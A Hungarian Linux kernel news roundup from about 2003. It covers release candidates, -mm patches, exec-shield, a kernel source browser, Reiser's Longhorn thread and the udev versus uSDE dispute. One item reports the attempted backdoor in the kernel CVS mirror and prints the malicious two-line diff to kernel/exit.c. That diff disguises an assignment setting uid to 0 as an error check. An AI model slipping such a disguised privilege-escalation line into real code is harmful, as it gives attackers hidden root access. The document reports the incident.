Kernel

"Hi,

Itt az -rc1.

Többek között hálózati eszközmeghajtó javításokat (b44, tg3, 8139cp), különböző x86-64 hibajavításokat tartalmaz.

Kérlek segíts tesztelni!" - írta Marcelo az LKML-re.

Larry McVoy - a BitMover alapítója, a Bitkeeper atyja - tegnap egy az LKML-re küldött levelében felhívta a fejlesztők figyelmét arra, hogy valaki backdoor kódot próbált becsempészni a fejlesztői kernelfába.

``Valaki közvetlenül módosította a CVS fát a kernel.bkbits.net-en. Dave megnézte a gépet és úgy látszik, hogy valaki megpróbált betörni, és meg is csinálta.''A módosított file a 'kernel/exit.c' file. A támadó közvetlenül a 2.6.0-test fejlesztői kernel CVS mirror szerverén nyúlt bele a fileba. A CVS logba - nyilván hibásan - David S. Miller (davem - a Red Hat kernelfejlesztője) neve került, mint módosító.

revision 1.121

date: 2003/11/04 16:44:19; author: davem; state: Exp; lines: +58 -0

Oops, I worked on the the wrong file, fixed again.

----------------------------

revision 1.120

date: 2003/11/04 16:42:00; author: davem; state: Exp; lines: +0 -58

*** empty log message ***

----------------------------

revision 1.119

date: 2003/11/04 16:22:47; author: davem; state: Exp; lines: +2 -0

*** empty log message ***

----------------------------

revision 1.118

date: 2003/10/27 19:50:03; author: torvalds; state: Exp; lines: +11 -5

Fix ZOMBIE race with self-reaping threads.

exit_notify() used to leave a window open when a thread

died that made the thread visible as a ZOMBIE even though

the thread reaped itself. This closes that window by marking

the thread DEAD within the tasklist_lock.

(Logical change 1.14141)

----------------------------

Közelebbről megvizsgálva a beillesztett két sornyi kódot, a fejlesztőknek egyértelművé vált, hogy valaki backdoor-t szeretett volna tenni a kernelforrásba. A kód úgy volt megírva, hogy a támadó ``root'' jogot kapott volna a szerveren, ha a támadás sikeres.

A CVS fa jelenleg már a normális kódot tartalmazza, így aki CVS-t használ a fejlesztéshez, az megteheti, hogy eltávolítja a kérdéses filet és frissít.

A beillesztett kód a következő:

--- GOOD 2003-11-05 13:46:44.000000000 -0800

+++ BAD 2003-11-05 13:46:53.000000000 -0800

@@ -1111,6 +1111,8 @@

schedule();

goto repeat;

}

+ if ((options == (__WCLONE|__WALL)) && (current->uid = 0))

+ retval = -EINVAL;

retval = -ECHILD;

end_wait4:

current->state =TASK_RUNNING;

Sokan támadták (köztük RMS is) annak idején a Bitkeeper-t, mondván, hogy kereskedelmi termékkel fejlesztenek egy nyílt forrású, szabad operációs rendszert. Linus ismert CVS ellenességéről. Ennek ellenére március közepe óta a 2.4 és 2.5 kernelforrások CVS-ben elérhetőek (korai Bitkeeper - CVS gateway már korábban is volt). Jelenleg úgy tűnik, hogy a CVS szervert támadták, a Bitkeeper-t nem. Linus szerint a Bitkeepert biztonságosabb, így ha valahol módosítás történt, akkor az a CVS volt.

A Bitkeeper pártolók hangja most biztos felerősödik. A thread itt.

Andrew Morton - a 2.6-os kernel karbantartója - ma kiadta a második -mm patchet a 2.6.0-test9 kernelhez. A patch random javításokat tartalmaz. Egy kis tuning a Nick Piggin féle anticipatory IO ütemezőhöz (a 2.6 jelenlegi alapértelmezett elevatora, amellyel voltak kisebb gondok az elmúlt napokban) és némi readahead tuning, amelyek segítségével jobb eredményt lehet elérni az adatbázis tesztekben.

Az anticipatory IO ütemező egyelőre még a deadline IO ütemező (a régi elevator kód) mögött van egy kicsit a teljesítményben a random IO tesztekben (adatbázis műveletek) de reménykedjünk.Az NVIDIA nForce chipset tulajdonosoknak jó hír, hogy az ethernet interface-hez kiadott GPL-es driver már elérhető az -mm2-ben.

Andrew offline lesz pár napig.

Mivel a 2.6.0 kernel fejlesztése a finiséhez érkezett (egyes hírek szerint már akár decemberben lehet stabil 2.6.0-ás kernel), kéretik fokozott intenzitással tesztelni az új kerneleket. A 2.6.0-test sorozat teljesen stabil, május vége óta kizárólag ezt használom az összes gépemen. Nyugodtan lehet (azért fokozott figyelemmel, ugye) tesztelni. Egyesek szerint masszívabb (szerintem is) mint a jelenlegi stabil 2.4 kernelsorozat utolsó tagjai. A bugokat az LKML-re (linux-kernel@vger.kernel.org) kéretik jelenteni.

A stuff letölthető innen.

AKPM levele itt.

Itt a Molnár Ingo féle exec-shield a legutolsó -mm kernelhez.Letöltés: exec-shield-2.6.0-test9-mm1-G4.



Az exec-shield-del kapcsolatos korábbi hírek itt. Telepítési útmutató itt.

Marcelo kiadta a 2.4.23-as kernel kilencedik pre verziojat. A bejelentesben azt olvashatjuk, hogy a 2.4.24-pre-ig mar csak bugfixeket fogad a karbantarto. Nehany korabban beolvasztott problemas ACPI patch eltavolitasra kerult a jelenlegi prepatch-bol.

Dave Jones (akkori SuSE-s, jelenleg Red Hat-os fejlesztő) pontosan egy éve adta a ki a Post-Halloween Document névre hallgató írását, amelyben arról írt, hogy mi várható a 2.6-os kernelben. A kernelhacker most a közelgő Halloween ünnep miatt nem tudta megállni, hogy ne frissítse írását.A naprakész lista a legutolsó teszt (2.6.0-test9) kernel alapján készült. Azoknak akik még nem kezdtek el ismerkedni a kiadás előt álló, új Linux kernellel, azoknak nagyon-nagyon hasznos lehet a dokumentum. Minden olyan kérdésre (és egy kicsit többre is) választ kaphatnak az írásból, amely felmerülhet a teszteléskor.

A frissített dokumentum a The post-halloween document. v0.46 (aka, 2.6 - what to expect) névre hallgat. Az írást megtalálod itt.

Dave bejelentése itt.

Robert Watson egy olyan weboldalt készített, amelyen több népszerű, nyílt forrású operációs rendszer kernelének forrását is meg tudjuk tekinteni.Amellett, hogy online böngészhetjük a forráskódokat, a kódok egyes soraihoz rendelt indexszekkel könnyedén manőverezhetünk a forráskódban. Az egyes operációs rendszerek kernelének belső felépítésével ismerkedőknek hasznos segítség lehet a tanulásban.

Hogy mely rendszerek kernelforrását találjuk meg az oldalon?

A FreeBSD head, releng51, releng50, releng49, releng4 és releng3-at, plusz a Linux 2.4.22 és 2.6.0-test9 kernelekét. Robert tervezi a felsorolt OS-ek mellett a OpenBSD, NetBSD és DragonFly BSD kernelek forrását is elhelyezni az oldalon.

Látogasd meg az oldalt itt.

Hans Reiser - a ReiserFS projekt kiötlője - küldött a minap egy érdekes levelet az LKML-re. A levélben arról ír, hogy a redmondi fejlesztők jónak látszó dolgokat próbálnak a Windows éveken belül megjelenő Longhorn verziójába beleépíteni. Felvetette, hogy esetleg a Linux kernelfejlesztőknek is lépniük kellene ebbe az irányba, nehogy egyes területeken lemaradjanak a fejlesztéssel. Ebből egy hosszú thread alakult ki.Reiser szerint a Longhorn fejlesztői arra keszülnek, hogy tranzakciós támogatást integráljanak bele az operációs rendszerbe. Minden XML-ben lesz, támogatást készítenek a filerendszerben való böngészhetőséghez. Az XML lekérdezés és böngészhetőség támogatása egy egységes formában fog megjelenni.

A levélre sok válasz érkezett. Sokak csak vaporware-nek nevezték a Longhorn ezen funkcióját. Ted Tso - veterán kernelfejlesztő - szerint nem biztos, hogy a Linux fejlesztőknek követniük kellene a windows fejlesztőket. Ha a windowsban megjelenik egy új funkció, akkor azt nem biztos, hogy nekik ugyanazon módon kell implementálniuk.

Kérte Reisert, hogy csak azért, mert egy vaporware sajtóbejelentést olvasott a Microsoft-tól, ne gondolja, hogy a.) az MS majd egy SQL optimalizátort fog beépíteni a Longhorn kernelébe, b.) hogy ha mégis megteszi, akkor a Linux fejlesztőknek követniük kellene a rossz példát, és ugyanazt kellene tenniük.

Az érdekes thread itt.

Andrew Morton - a 2.6-os Linux kernel karbantartója - ma kiadta az első -mm patchet a 2.6.0-test9 kernelhez. Néhány fontos javítás kapott benne helyet.

Október elején volt szó arról, hogy lassan búcsút mondhatunk a Linux kernelben levő devfs-nek, és helyét valószínűleg a Greg Kroah-Hartman által koordinált udev veszi majd át. Azért valószínűleg, mert ma felbukkant egy másik lehetséges alternatíva is. És egy kis flame kezd(ett) kialakulni ezzel kapcsolatban...

Mark Bellon - a Montavista embere - jelentette be ma a ``User-Space System Device Enumeration'' első publikus verzióját, amelyet a sourceforge.net/projects/usde oldalon lehet megtalálni. A uSDE (hasonlóan az udev-hez) függ a /sbin/hotplug-tól, a sysfs-től és ezek mellett még a /proc filerendszertől.A bejelentő szerint az uSDE sok szempontból hasonló az udev-hez. Greg Kroah-Hartman feltette a kérdést a bejelentőnek, hogy mi a probléma az udev-vel, miben más az uSDE mint az udev. Mi késztette a bejelentőt arra, hogy egy új, hasonló funkciójú implementációt fejlesszen ki. Greg KH megjegyezte, hogy az udev publikusan elérhető ez év áprilisa óta. Megkérdezte, hogy mi az oka annak, hogy egy teljesen új projektet indítottak az uSDE fejlesztői. Szerinte

sokkal ésszerűbb lett volna az udev fejlesztésébe beszállniuk.

Egyes fejlesztők szerint csak időpocsékolás volt az USDE-t párhuzamosan, titokban fejleszteni az udev-vel. Voltak akik azt mondták, hogy szólni kellett volna áprilisban (amikor Greg KH bejelentette az udev-et), hogy folyik egy hasonló projekt, mert akkor el lehetett volna dönteni, hogy melyik az életképesebb.

Grg KH szerint a projekt bejelentője már február-március körül beszélt az uSDE részleteiről. Gregnek a legnagyobb frusztrációt az okozza, hogy ha az uSDE fejlesztői úgy találták, hogy az udev valamilyen dologban hiányt szenved, akkor azt miért nem jelezték, miért nem segítettek a problémát megoldani, és ehelyett miért választották azt az utat, hogy titokban dolgoznak egy hasonló projekten.

John Cherry szerint szégyen, hogy két csapat dolgozott ugyanazon problémán egy időben. Megjegyezte, hogy jelenleg két implementációjuk van. Felvetette, hogy nézzék meg a felek a különbségeket/hibákat, üljenek asztalhoz, működjenek együtt és oldják meg a problémákat.

A thread itt.